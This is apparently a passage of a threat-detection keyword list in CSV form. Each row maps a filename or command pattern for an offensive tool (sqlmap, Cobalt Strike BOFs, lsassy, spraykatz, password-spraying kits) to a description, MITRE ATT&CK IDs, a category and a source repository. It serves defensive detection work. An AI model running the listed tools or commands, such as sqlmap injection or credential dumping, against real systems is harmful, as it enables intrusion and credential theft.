tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sprayhound-master.zip*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*SprayingToolkit.git*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*SprayingToolkit-master*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*SprayingToolkit-master.zip*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*spraykatz*,offensive_tool_keyword,spraykatz,Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.,T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008,TA0003 - TA0004 - TA0007,N/A,N/A,Credential Access,https://github.com/aas-n/spraykatz,1,1,N/A,N/A,8,737,126,2020-06-20T12:14:00Z,2019-09-09T14:38:28Z -*spring_framework_malicious_jar*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Spring-cloud-function-SpEL-RCE*,offensive_tool_keyword,POC,RCE PoC of 0-day Vulnerability found in Spring Cloud (SPEL),T1059 - T1210 - T1507,TA0002 - TA0040 - TA0043,N/A,N/A,Exploitation tools,https://github.com/chaosec2021/Spring-cloud-function-SpEL-RCE,1,1,N/A,N/A,,N/A,,, -*spring-core-rce*ROOT.war*,offensive_tool_keyword,spring-core-rce,CVE-2022-22965 : about spring core rce,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,1,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z -*springFramework_CVE-2022-22965_RCE.py*,offensive_tool_keyword,POC,SpringFramework CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE,1,0,N/A,N/A,1,76,17,2022-04-01T12:08:45Z,2022-04-01T04:51:44Z -*spyonweb-get-rootdomains *,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -*sql_persister.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*SqlClrPayload*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*sqldumper.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*sqli_common_shared.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Sqli-lab*,offensive_tool_keyword,sqli-labs,SQLI-LABS is a platform to learn SQLI Following labs are covered for GET and POST scenarios:,T1190 - T1553,TA0002 - TA0008,N/A,N/A,Web Attacks,https://github.com/Audi-1/sqli-labs,1,1,N/A,N/A,10,4688,1476,2020-06-04T19:51:55Z,2012-05-19T19:41:26Z -*SQL-Injection-Auth-Bypass-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*SQL-Injection-Libraries*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SQL-Injection-Payloads.*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*SQLiPy.py*,offensive_tool_keyword,sqlipy,SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.,T1190 - T1210 - T1574,TA0002 - TA0040 - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/sqlipy,1,1,N/A,N/A,3,247,102,2023-05-08T18:50:41Z,2014-09-22T03:25:42Z -*SQLiScanner*,offensive_tool_keyword,SQLiScanner,Automatic SQL injection with Charles and sqlmapapi,T1190 - T1556 - T1210 - T1573,TA0002 - TA0003 - TA0008,N/A,N/A,Web Attacks,https://github.com/0xbug/SQLiScanner,1,1,N/A,N/A,8,760,298,2018-05-01T09:59:47Z,2016-08-28T06:06:32Z -*sqlite:///ares.db*,offensive_tool_keyword,Ares,Python C2 botnet and backdoor ,T1105 - T1102 - T1055,TA0003 - TA0002 - TA0007,N/A,N/A,C2,https://github.com/sweetsoftware/Ares,1,0,N/A,10,10,1439,523,2023-03-02T12:43:09Z,2015-10-18T12:26:27Z -*sqlmap -*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmap --forms --batch -u *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*sqlmap.conf*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1059 - T1553 - T1574 - T1210 - T1220,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmap.py*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1059 - T1553 - T1574 - T1210 - T1220,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmap.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*sqlmap/data/txt/wordlist.txt*,offensive_tool_keyword,wordlists,package contains the rockyou.txt wordlist,T1110.001,TA0006,N/A,N/A,Credential Access,https://www.kali.org/tools/wordlists/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*sqlmap4burp*.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*sqlmapapi -*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmapapi.py,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1059 - T1553 - T1574 - T1210 - T1220,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*sqlmapapi.py*,offensive_tool_keyword,sqlipy,SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.,T1190 - T1210 - T1574,TA0002 - TA0040 - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/sqlipy,1,1,N/A,N/A,3,247,102,2023-05-08T18:50:41Z,2014-09-22T03:25:42Z -*sqlmapproject/sqlmap*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*SQLmate*,offensive_tool_keyword,SQLmate,A friend of SQLmap which will do what you always expected from SQLmap.,T1210 - T1211 - T1021 - T1059,TA0002 - TA0011 - TA0003,N/A,N/A,Web Attacks,https://github.com/s0md3v/sqlmate,1,1,N/A,N/A,4,392,119,2019-05-05T15:53:06Z,2017-10-19T19:55:58Z -*sqlninja*,offensive_tool_keyword,sqlninja,...a SQL Server injection & takeover tool,T1505 - T1526 - T1583 - T1588 - T1590,TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011,N/A,N/A,Web Attacks,http://sqlninja.sourceforge.net/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*SQLRecon.exe*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,1,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*SQLRecon.git*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,1,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*SQLServer_Accessible_PotentialSensitiveData.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*SQLServer_DefaultLogin.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*src/cracker.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*src/genmkvpwd.*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*src/john.asm*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*src/ligolo*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*src/obfuscator.c*,offensive_tool_keyword,Striker,Striker is a simple Command and Control (C2) program.,T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/4g3nt47/Striker,1,1,N/A,10,10,279,43,2023-05-04T18:00:05Z,2022-09-07T10:09:41Z -*src/Remote/chromeKey/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/lastpass/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/sc_config/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/sc_create/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/sc_delete/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/Remote/sc_start/*,offensive_tool_keyword,cobaltstrike,Cobaltstrike injection BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Remote-OPs-BOF,1,1,N/A,10,10,599,98,2023-09-26T19:21:22Z,2022-04-25T16:32:08Z -*src/ShellGhost.c*,offensive_tool_keyword,ShellGhost,A memory-based evasion technique which makes shellcode invisible from process start to end,T1055.012 - T1027.002 - T1055.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/lem0nSec/ShellGhost,1,1,N/A,N/A,9,892,102,2023-07-24T12:22:32Z,2023-07-01T16:56:58Z -*Src/Spray-AD*,offensive_tool_keyword,cobaltstrike,A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*src/tests/NESSIE/*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*src/xmrig.cpp*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*src/zerologon.c*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF zerologon exploit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ZeroLogon-BOF,1,1,N/A,10,10,148,40,2022-04-25T11:22:45Z,2020-09-17T02:07:13Z -*src\unhook.c*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and 